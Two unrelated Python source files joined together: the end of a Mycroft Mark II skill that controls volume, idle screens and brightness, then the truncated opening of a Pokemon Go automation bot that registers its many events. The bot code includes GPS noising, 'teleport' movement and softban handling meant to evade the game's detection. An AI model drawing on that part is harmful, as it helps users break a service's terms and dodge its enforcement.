# Update use of wake-up beep
self._sync_wake_beep_setting()
self.settings_change_callback = self.on_websettings_changed
def start_listening_thread(self):
# Start listening thread
if not self.thread:
self.running = True
self.thread = Thread(target=self.listen_thread)
self.thread.daemon = True
self.thread.start()
def stop_listening_thread(self):
if self.thread:
self.running = False
self.thread.join()
self.thread = None
###################################################################
# System events
def handle_system_reboot(self, message):
self.speak_dialog('rebooting', wait=True)
subprocess.call(['/usr/bin/systemctl', 'reboot'])
def handle_system_shutdown(self, message):
subprocess.call(['/usr/bin/systemctl', 'poweroff'])
###################################################################
# System volume
def on_volume_set(self, message):
""" Force vol between 0.0 and 1.0. """
vol = message.data.get("percent", 0.5)
vol = clip(vol, 0.0, 1.0)
self.volume = vol
self.muted = False
self.set_hardware_volume(vol)
self.show_volume = True
def on_volume_get(self, message):
""" Handle request for current volume. """
self.bus.emit(message.response(data={'percent': self.volume,
'muted': self.muted}))
def set_hardware_volume(self, pct):
""" Set the volume on hardware (which supports levels 0-63).
Arguments:
pct (int): audio volume (0.0 - 1.0).
"""
vol = int(VOL_SMAX * pct + VOL_OFFSET) if pct >= 0.01 else VOL_ZERO
self.log.debug('Setting hardware volume to: {}'.format(pct))
command = ['i2cset',
'-y', # force a write
str(self.i2c_channel), # i2c bus number
'0x4b', # stereo amp device addr
str(vol)] # volume level, 0-63
self.log.info(' '.join(command))
try:
subprocess.call(command)
except Exception as e:
self.log.error('Couldn\'t set volume. ({})'.format(e))
def get_hardware_volume(self):
# Get the volume from hardware
command = ['i2cget', '-y', str(self.i2c_channel), '0x4b']
self.log.info(' '.join(command))
try:
vol = subprocess.check_output(command)
# Convert the returned hex value from i2cget
hw_vol = int(vol, 16)
hw_vol = clip(hw_vol, 0, 63)
self.volume = clip((hw_vol - VOL_OFFSET) / VOL_SMAX, 0.0, 1.0)
except subprocess.CalledProcessError as e:
self.log.info('I2C Communication error: {}'.format(repr(e)))
except FileNotFoundError:
self.log.info('i2cget couldn\'t be found')
except Exception:
self.log.info('UNEXPECTED VOLUME RESULT: {}'.format(vol))
###################################################################
# Idle screen mechanism
def save_resting_screen(self):
""" Handler to be called if the settings are changed by
the GUI.
Stores the selected idle screen.
"""
self.log.debug("Saving resting screen")
self.settings['selected'] = self.gui['selected']
self.gui['selectedScreen'] = self.gui['selected']
def collect_resting_screens(self):
""" Trigger collection and then show the resting screen. """
self.bus.emit(Message('mycroft.mark2.collect_idle'))
time.sleep(1)
self.show_idle_screen()
def on_register_idle(self, message):
""" Handler for catching incoming idle screens. """
if 'name' in message.data and 'id' in message.data:
self.idle_screens[message.data['name']] = message.data['id']
self.log.info('Registered {}'.format(message.data['name']))
else:
self.log.error('Malformed idle screen registration received')
def reset_face(self, message):
""" Triggered after skills are initialized.
Sets switches from resting "face" to a registered resting screen.
"""
time.sleep(1)
self.collect_resting_screens()
def listen_thread(self):
""" listen on mic input until self.running is False. """
self.setup_mic_listening()
self.log.debug("Starting listening")
while(self.running):
self.listen()
self.stream.close()
self.log.debug("Listening stopped")
def get_audio_level(self):
""" Get level directly from audio device. """
try:
block = self.stream.read(INPUT_FRAMES_PER_BLOCK)
except IOError as e:
# damn
self.errorcount += 1
self.log.error('{} Error recording: {}'.format(self.errorcount, e))
return None
amplitude = get_rms(block)
result = int(amplitude / ((self.max_amplitude) + 0.001) * 15)
self.max_amplitude = max(amplitude, self.max_amplitude)
return result
def get_listener_level(self):
""" Get level from IPC file created by listener. """
time.sleep(0.05)
if not self.listener_file:
try:
self.listener_file = os.path.join(get_ipc_directory(),
'mic_level')
except FileNotFoundError:
return None
try:
st_results = os.stat(self.listener_file)
if (not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
ret = read_file_from(self.listener_file, 0)
self.st_results = st_results
if ret is not None:
if ret > self.max_amplitude:
self.max_amplitude = ret
ret = int(ret / self.max_amplitude * 10)
return ret
except Exception as e:
self.log.error(repr(e))
return None
def listen(self):
""" Read microphone level and store rms into self.gui['volume']. """
amplitude = self.get_audio_level()
# amplitude = self.get_listener_level()
if (self.gui and
('volume' not in self.gui or self.gui['volume'] != amplitude) and
amplitude is not None):
self.gui['volume'] = amplitude
def restore_idle_screen(self, _=None):
if (self.override_idle and
time.monotonic() - self.override_idle[1] > 2):
self.override_idle = None
self.show_idle_screen()
def stop(self, message=None):
""" Clear override_idle and stop visemes. """
self.log.info('Stop received')
if time.monotonic() > self.idle_override_set_time + 7:
self.restore_idle_screen()
self.gui['viseme'] = {'start': 0, 'visemes': []}
return False
def shutdown(self):
# Gotta clean up manually since not using add_event()
self.bus.remove('mycroft.skill.handler.start',
self.on_handler_started)
self.bus.remove('recognizer_loop:sleep',
self.on_handler_sleep)
self.bus.remove('mycroft.awoken',
self.on_handler_awoken)
self.bus.remove('enclosure.mouth.reset',
self.on_handler_mouth_reset)
self.bus.remove('recognizer_loop:audio_output_end',
self.on_handler_mouth_reset)
self.bus.remove('enclosure.mouth.viseme_list',
self.on_handler_speaking)
self.bus.remove('gui.page.show',
self.on_gui_page_show)
self.bus.remove('gui.page_interaction', self.on_gui_page_interaction)
self.bus.remove('mycroft.mark2.register_idle', self.on_register_idle)
self.stop_listening_thread()
#####################################################################
# Manage "busy" visual
def on_handler_started(self, message):
handler = message.data.get("handler", "")
# Ignoring handlers from this skill and from the background clock
if 'Mark2' in handler:
return
if 'TimeSkill.update_display' in handler:
return
def on_gui_page_interaction(self, message):
""" Reset idle timer to 30 seconds when page is flipped. """
self.log.info("Resetting idle counter to 30 seconds")
self.start_idle_event(30)
def on_gui_page_show(self, message):
if 'mark-2' not in message.data.get('__from', ''):
# Some skill other than the handler is showing a page
self.has_show_page = True
# If a skill overrides the idle do not switch page
override_idle = message.data.get('__idle')
if override_idle is True:
# Disable idle screen
self.idle_override_set_time = time.monotonic()
self.log.info('Cancelling Idle screen')
self.cancel_idle_event()
self.override_idle = (message, time.monotonic())
elif isinstance(override_idle, int) and override_idle is not False:
# Set the indicated idle timeout
self.idle_override_set_time = time.monotonic()
self.log.info('Overriding idle timer to'
' {} seconds'.format(override_idle))
self.start_idle_event(override_idle)
elif (message.data['page'] and
not message.data['page'][0].endswith('idle.qml')):
# Check if the show_page deactivates a previous idle override
# This is only possible if the page is from the same skill
self.log.info('Cancelling idle override')
if (override_idle is False and
compare_origin(message, self.override_idle[0])):
# Remove the idle override page if override is set to false
self.override_idle = None
# Set default idle screen timer
self.start_idle_event(30)
def on_handler_mouth_reset(self, message):
""" Restore viseme to a smile. """
pass
def on_handler_sleep(self, message):
""" Show resting face when going to sleep. """
self.gui['state'] = 'resting'
self.gui.show_page('all.qml')
def on_handler_awoken(self, message):
""" Show awake face when sleep ends. """
self.gui['state'] = 'awake'
self.gui.show_page('all.qml')
def on_handler_complete(self, message):
""" When a skill finishes executing clear the showing page state. """
handler = message.data.get('handler', '')
# Ignoring handlers from this skill and from the background clock
if 'Mark2' in handler:
return
if 'TimeSkill.update_display' in handler:
return
self.has_show_page = False
try:
if self.hourglass_info[handler] == -1:
self.enclosure.reset()
del self.hourglass_info[handler]
except Exception:
# There is a slim chance the self.hourglass_info might not
# be populated if this skill reloads at just the right time
# so that it misses the mycroft.skill.handler.start but
# catches the mycroft.skill.handler.complete
pass
#####################################################################
# Manage "speaking" visual
def on_handler_speaking(self, message):
""" Show the speaking page if no skill has registered a page
to be shown in it's place.
"""
self.gui["viseme"] = message.data
if not self.has_show_page:
self.gui['state'] = 'speaking'
self.gui.show_page("all.qml")
# Show idle screen after the visemes are done (+ 2 sec).
time = message.data['visemes'][-1][1] + 5
self.start_idle_event(time)
#####################################################################
# Manage "idle" visual state
def cancel_idle_event(self):
self.idle_next = 0
self.cancel_scheduled_event('IdleCheck')
def start_idle_event(self, offset=60, weak=False):
""" Start an event for showing the idle screen.
Arguments:
offset: How long until the idle screen should be shown
weak: set to true if the time should be able to be overridden
"""
with self.idle_lock:
if time.monotonic() + offset < self.idle_next:
self.log.info('No update, before next time')
return
self.log.info('Starting idle event')
try:
if not weak:
self.idle_next = time.monotonic() + offset
# Clear any existing checker
self.cancel_scheduled_event('IdleCheck')
time.sleep(0.5)
self.schedule_event(self.show_idle_screen, int(offset),
name='IdleCheck')
self.log.info('Showing idle screen in '
'{} seconds'.format(offset))
except Exception as e:
self.log.exception(repr(e))
def show_idle_screen(self):
""" Show the idle screen or return to the skill that's overriding idle.
"""
self.log.debug('Showing idle screen')
screen = None
if self.override_idle:
self.log.debug('Returning to override idle screen')
# Restore the page overriding idle instead of the normal idle
self.bus.emit(self.override_idle[0])
elif len(self.idle_screens) > 0 and 'selected' in self.gui:
# TODO remove hard coded value
self.log.debug('Showing Idle screen for '
'{}'.format(self.gui['selected']))
screen = self.idle_screens.get(self.gui['selected'])
if screen:
self.bus.emit(Message('{}.idle'.format(screen)))
def handle_listener_started(self, message):
""" Shows listener page after wakeword is triggered.
Starts countdown to show the idle page.
"""
# Start idle timer
self.cancel_idle_event()
self.start_idle_event(weak=True)
# Lower the max by half at the start of listener to make sure
# loud noices doesn't make the level stick to much
if self.max_amplitude > 0.001:
self.max_amplitude /= 2
self.start_listening_thread()
# Show listening page
self.gui['state'] = 'listening'
self.gui.show_page('all.qml')
def handle_listener_ended(self, message):
""" When listening has ended show the thinking animation. """
self.has_show_page = False
self.gui['state'] = 'thinking'
self.gui.show_page('all.qml')
self.stop_listening_thread()
def handle_failed_stt(self, message):
""" No discernable words were transcribed. Show idle screen again. """
self.show_idle_screen()
#####################################################################
# Manage network connction feedback
def handle_internet_connected(self, message):
""" System came online later after booting. """
self.enclosure.mouth_reset()
#####################################################################
# Web settings
def on_websettings_changed(self):
""" Update use of wake-up beep. """
self._sync_wake_beep_setting()
def _sync_wake_beep_setting(self):
""" Update "use beep" global config from skill settings. """
from mycroft.configuration.config import (
LocalConf, USER_CONFIG, Configuration
)
config = Configuration.get()
use_beep = self.settings.get('use_listening_beep') is True
if not config['confirm_listening'] == use_beep:
# Update local (user) configuration setting
new_config = {
'confirm_listening': use_beep
}
user_config = LocalConf(USER_CONFIG)
user_config.merge(new_config)
user_config.store()
self.bus.emit(Message('configuration.updated'))
#####################################################################
# Brightness intent interaction
def percent_to_level(self, percent):
""" Converts the brigtness value from percentage to a
value the Arduino can read
Arguments:
percent (int): interger value from 0 to 100
return:
(int): value form 0 to 30
"""
return int(float(percent) / float(100) * 30)
def parse_brightness(self, brightness):
""" Parse text for brightness percentage.
Arguments:
brightness (str): string containing brightness level
Returns:
(int): brightness as percentage (0-100)
"""
try:
# Handle "full", etc.
name = normalize(brightness)
if name in self.brightness_dict:
return self.brightness_dict[name]
if '%' in brightness:
brightness = brightness.replace("%", "").strip()
return int(brightness)
if 'percent' in brightness:
brightness = brightness.replace("percent", "").strip()
return int(brightness)
i = int(brightness)
if i < 0 or i > 100:
return None
if i < 30:
# Assmume plain 0-30 is "level"
return int((i * 100.0) / 30.0)
# Assume plain 31-100 is "percentage"
return i
except Exception:
return None # failed in an int() conversion
def set_screen_brightness(self, level, speak=True):
""" Actually change screen brightness.
Arguments:
level (int): 0-30, brightness level
speak (bool): when True, speak a confirmation
"""
# TODO CHANGE THE BRIGHTNESS
if speak is True:
percent = int(float(level) * float(100) / float(30))
self.speak_dialog(
'brightness.set', data={'val': str(percent) + '%'})
def _set_brightness(self, brightness):
# brightness can be a number or word like "full", "half"
percent = self.parse_brightness(brightness)
if percent is None:
self.speak_dialog('brightness.not.found.final')
elif int(percent) is -1:
self.handle_auto_brightness(None)
else:
self.auto_brightness = False
self.set_screen_brightness(self.percent_to_level(percent))
@intent_file_handler('brightness.intent')
def handle_brightness(self, message):
""" Intent handler to set custom screen brightness.
Arguments:
message (dict): messagebus message from intent parser
"""
brightness = (message.data.get('brightness', None) or
self.get_response('brightness.not.found'))
if brightness:
self._set_brightness(brightness)
def _get_auto_time(self):
""" Get dawn, sunrise, noon, sunset, and dusk time.
Returns:
times (dict): dict with associated (datetime, level)
"""
tz = self.location['timezone']['code']
lat = self.location['coordinate']['latitude']
lon = self.location['coordinate']['longitude']
ast_loc = astral.Location()
ast_loc.timezone = tz
ast_loc.lattitude = lat
ast_loc.longitude = lon
user_set_tz = \
timezone(tz).localize(datetime.now()).strftime('%Z')
device_tz = time.tzname
if user_set_tz in device_tz:
sunrise = ast_loc.sun()['sunrise']
noon = ast_loc.sun()['noon']
sunset = ast_loc.sun()['sunset']
else:
secs = int(self.location['timezone']['offset']) / -1000
sunrise = arrow.get(
ast_loc.sun()['sunrise']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
noon = arrow.get(
ast_loc.sun()['noon']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
sunset = arrow.get(
ast_loc.sun()['sunset']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
return {
'Sunrise': (sunrise, 20), # high
'Noon': (noon, 30), # full
'Sunset': (sunset, 5) # dim
}
def schedule_brightness(self, time_of_day, pair):
""" Schedule auto brightness with the event scheduler.
Arguments:
time_of_day (str): Sunrise, Noon, Sunset
pair (tuple): (datetime, brightness)
"""
d_time = pair[0]
brightness = pair[1]
now = arrow.now()
arw_d_time = arrow.get(d_time)
data = (time_of_day, brightness)
if now.timestamp > arw_d_time.timestamp:
d_time = arrow.get(d_time).shift(hours=+24)
self.schedule_event(self._handle_screen_brightness_event, d_time,
data=data, name=time_of_day)
else:
self.schedule_event(self._handle_screen_brightness_event, d_time,
data=data, name=time_of_day)
@intent_file_handler('brightness.auto.intent')
def handle_auto_brightness(self, message):
""" brightness varies depending on time of day
Arguments:
message (Message): messagebus message from intent parser
"""
self.auto_brightness = True
auto_time = self._get_auto_time()
nearest_time_to_now = (float('inf'), None, None)
for time_of_day, pair in auto_time.items():
self.schedule_brightness(time_of_day, pair)
now = arrow.now().timestamp
t = arrow.get(pair[0]).timestamp
if abs(now - t) < nearest_time_to_now[0]:
nearest_time_to_now = (abs(now - t), pair[1], time_of_day)
self.set_screen_brightness(nearest_time_to_now[1], speak=False)
def _handle_screen_brightness_event(self, message):
""" Wrapper for setting screen brightness from eventscheduler
Arguments:
message (Message): messagebus message
"""
if self.auto_brightness is True:
time_of_day = message.data[0]
level = message.data[1]
self.cancel_scheduled_event(time_of_day)
self.set_screen_brightness(level, speak=False)
pair = self._get_auto_time()[time_of_day]
self.schedule_brightness(time_of_day, pair)
#####################################################################
# Device Settings
@intent_file_handler('device.settings.intent')
def handle_device_settings(self, message):
""" Display device settings page. """
self.gui['state'] = 'settings/settingspage'
self.gui.show_page('all.qml')
@intent_file_handler('device.wifi.settings.intent')
def handle_show_wifi_screen_intent(self, message):
""" display network selection page. """
self.gui.clear()
self.gui['state'] = 'settings/networking/SelectNetwork'
self.gui.show_page('all.qml')
@intent_file_handler('device.homescreen.settings.intent')
def handle_device_homescreen_settings(self, message):
"""
display homescreen settings page
"""
screens = [{'screenName': s, 'screenID': self.idle_screens[s]}
for s in self.idle_screens]
self.gui['idleScreenList'] = {'screenBlob': screens}
self.gui['selectedScreen'] = self.gui['selected']
self.gui['state'] = 'settings/homescreen_settings'
self.gui.show_page('all.qml')
@intent_file_handler('device.ssh.settings.intent')
def handle_device_ssh_settings(self, message):
""" Display ssh settings page. """
self.gui['state'] = 'settings/ssh_settings'
self.gui.show_page('all.qml')
@intent_file_handler('device.reset.settings.intent')
def handle_device_factory_reset_settings(self, message):
""" Display device factory reset settings page. """
self.gui['state'] = 'settings/factoryreset_settings'
self.gui.show_page('all.qml')
def set_idle_screen(self, message):
""" Set selected idle screen from message. """
self.gui['selected'] = message.data['selected']
self.save_resting_screen()
def handle_device_update_settings(self, message):
""" Display device update settings page. """
self.gui['state'] = 'settings/updatedevice_settings'
self.gui.show_page('all.qml')
def handle_device_restart_action(self, message):
""" Device restart action. """
self.log.info('PlaceholderRestartAction')
def handle_device_poweroff_action(self, message):
""" Device poweroff action. """
self.log.info('PlaceholderShutdownAction')
def create_skill():
return Mark2()
|
__init__.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
import shelve
import uuid
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
from s2sphere import Cell, CellId, LatLng
from . import cell_workers
from .base_task import BaseTask
from .plugin_loader import PluginLoader
from .api_wrapper import ApiWrapper
from .cell_workers.utils import distance
from .event_manager import EventManager
from .human_behaviour import sleep
from .item_list import Item
from .metrics import Metrics
from .sleep_schedule import SleepSchedule
from pokemongo_bot.event_handlers import SocketIoHandler, LoggingHandler, SocialHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from .worker_result import WorkerResult
from .tree_config_builder import ConfigException
from .tree_config_builder import MismatchTaskApiVersion
from .tree_config_builder import TreeConfigBuilder
from .inventory import init_inventory, player
from sys import platform as _platform
from pgoapi.protos.POGOProtos.Enums import BadgeType_pb2
from pgoapi.exceptions import AuthException
class FileIOException(Exception):
pass
class PokemonGoBot(object):
@property
def position(self):
return self.api.actual_lat, self.api.actual_lng, self.api.actual_alt
@property
def noised_position(self):
return self.api.noised_lat, self.api.noised_lng, self.api.noised_alt
#@position.setter # these should be called through api now that gps replication is there...
#def position(self, position_tuple):
# self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
"""
Returns the player data as received from the API.
:return: The player data.
:rtype: dict
"""
return self._player
@property
def stardust(self):
return filter(lambda y: y['name'] == 'STARDUST', self._player['currencies'])[0]['amount']
@stardust.setter
def stardust(self, value):
filter(lambda y: y['name'] == 'STARDUST', self._player['currencies'])[0]['amount'] = value
def __init__(self, db, config):
self.database = db
self.config = config
super(PokemonGoBot, self).__init__()
self.fort_timeouts = dict()
self.pokemon_list = json.load(
open(os.path.join(_base_dir, 'data', 'pokemon.json'))
)
self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
# @var Metrics
self.metrics = Metrics(self)
self.latest_inventory = None
self.cell = None
self.recent_forts = [None] * config.forts_max_circle_size
self.tick_count = 0
self.softban = False
self.wake_location = None
self.start_position = None
self.last_map_object = None
self.last_time_map_object = 0
self.logger = logging.getLogger(type(self).__name__)
self.alt = self.config.gps_default_altitude
# Make our own copy of the workers for this instance
self.workers = []
# Theading setup for file writing
self.web_update_queue = Queue.Queue(maxsize=1)
self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
self.web_update_thread.start()
# Heartbeat limiting
self.heartbeat_threshold = self.config.heartbeat_threshold
self.heartbeat_counter = 0
self.last_heartbeat = time.time()
self.hb_locked = False # lock hb on snip
# Inventory refresh limiting
self.inventory_refresh_threshold = 10
self.inventory_refresh_counter = 0
self.last_inventory_refresh = time.time()
# Catch on/off
self.catch_disabled = False
self.capture_locked = False # lock catching while moving to VIP pokemon
client_id_file_path = os.path.join(_base_dir, 'data', 'mqtt_client_id')
saved_info = shelve.open(client_id_file_path)
key = 'client_id'.encode('utf-8')
if key in saved_info:
self.config.client_id = saved_info[key]
else:
self.config.client_id = str(uuid.uuid4())
saved_info[key] = self.config.client_id
saved_info.close()
def start(self):
self._setup_event_system()
self.sleep_schedule = SleepSchedule(self, self.config.sleep_schedule) if self.config.sleep_schedule else None
if self.sleep_schedule:
self.sleep_schedule.work()
self._setup_api()
self._load_recent_forts()
init_inventory(self)
self.display_player_info()
self._print_character_info()
if self.config.pokemon_bag_show_at_start and self.config.pokemon_bag_pokemon_info:
self._print_list_pokemon()
random.seed()
def _setup_event_system(self):
handlers = []
color = self.config.logging and 'color' in self.config.logging and self.config.logging['color']
debug = self.config.debug
handlers.append(LoggingHandler(color, debug))
handlers.append(SocialHandler(self))
if self.config.websocket_server_url:
if self.config.websocket_start_embedded_server:
self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
self.sio_runner.start_listening_async()
websocket_handler = SocketIoHandler(
self,
self.config.websocket_server_url
)
handlers.append(websocket_handler)
if self.config.websocket_remote_control:
remote_control = WebsocketRemoteControl(self).start()
# @var EventManager
self.event_manager = EventManager(self.config.walker_limit_output, *handlers)
self._register_events()
if self.config.show_events:
self.event_manager.event_report()
sys.exit(1)
# Registering event:
# self.event_manager.register_event("location", parameters=['lat', 'lng'])
#
# Emitting event should be enough to add logging and send websocket
# message: :
# self.event_manager.emit('location', 'level'='info', data={'lat': 1, 'lng':1}),
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event('debug')
self.event_manager.register_event('refuse_to_sit')
self.event_manager.register_event('reset_destination')
self.event_manager.register_event('new_destination')
self.event_manager.register_event('moving_to_destination')
self.event_manager.register_event('arrived_at_destination')
self.event_manager.register_event('staying_at_destination')
self.event_manager.register_event('buddy_pokemon', parameters=('pokemon', 'iv', 'cp'))
self.event_manager.register_event('buddy_reward', parameters=('pokemon', 'family', 'candy_earned', 'candy'))
self.event_manager.register_event('buddy_walked', parameters=('pokemon', 'distance_walked', 'distance_needed'))
# ignore candy above threshold
self.event_manager.register_event(
'ignore_candy_above_thresold',
parameters=(
'name',
'amount',
'threshold'
)
)
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event(
'path_lap_update',
parameters=(
'number_lap',
'number_lap_max'
)
)
self.event_manager.register_event(
'path_lap_end',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
self.event_manager.register_event('bot_interrupted')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_sleep',
parameters=(
'time_hms',
'wake'
)
)
# random pause
self.event_manager.register_event(
'next_random_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_pause',
parameters=(
'time_hms',
'resume'
)
)
# recycle stuff
self.event_manager.register_event(
'next_force_recycle',
parameters=(
'time'
)
)
self.event_manager.register_event('force_recycle')
# random alive pause
self.event_manager.register_event(
'next_random_alive_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_alive_pause',
parameters=(
'time_hms',
'resume'
)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'distance'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'distance',
'lure_distance'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event('arrived_at_fort')
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms',
'pokemon_name'
)
)
self.event_manager.register_event(
'incensed_pokemon_found',
parameters=(
'pokemon_id',
'encounter_id',
'encounter_location',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'ncp',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event('enough_ultraballs')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'throw_type',
'spin_label',
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'vanish_limit_reached',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'stardust',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'daily_catch_limit',
'caught_last_24_hour',
)
)
self.event_manager.register_event(
'pokemon_vip_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'stardust',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'daily_catch_limit',
'caught_last_24_hour',
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'iv', 'cp', 'candy', 'xp')
)
self.event_manager.register_event(
'pokemon_evolve_check',
parameters=('has', 'needs')
)
self.event_manager.register_event(
'pokemon_upgraded',
parameters=('pokemon', 'iv', 'cp', 'candy', 'stardust')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('quantity', 'type'))
self.event_manager.register_event('catch_limit')
self.event_manager.register_event('spin_limit')
self.event_manager.register_event('show_best_pokemon', parameters=('pokemons'))
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('eggs_left', 'eggs_inc', 'eggs')
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'name', 'cp', 'ncp', 'iv_ads', 'iv_pct', 'exp', 'stardust', 'candy'
)
)
self.event_manager.register_event('egg_hatched_fail')
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'ivcp', 'below_iv', 'below_cp', 'below_ivcp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'iv', 'cp', 'ivcp', 'candy', 'candy_type')
)
self.event_manager.register_event(
'pokemon_keep',
parameters=('pokemon', 'iv', 'cp', 'ivcp')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'num_points', 'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=('old_name', 'current_name',)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event(
'unset_pokemon_nickname',
parameters=('old_name',)
)
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
self.event_manager.register_event(
'moving_to_pokemon_throught_fort',
parameters=('fort_name', 'distance','poke_name','poke_dist')
)
self.event_manager.register_event(
'move_to_map_pokemon',
parameters=('message')
)
# cached recent_forts
self.event_manager.register_event('loaded_cached_forts')
self.event_manager.register_event('cached_fort')
self.event_manager.register_event(
'no_cached_forts',
parameters=('path', )
)
self.event_manager.register_event(
'error_caching_forts',
parameters=('path', )
)
# database shit
self.event_manager.register_event('catch_log')
self.event_manager.register_event('vanish_log')
self.event_manager.register_event('evolve_log')
self.event_manager.register_event('login_log')
self.event_manager.register_event('transfer_log')
self.event_manager.register_event('pokestop_log')
self.event_manager.register_event('softban_log')
self.event_manager.register_event('eggs_hatched_log')
self.event_manager.register_event(
'badges',
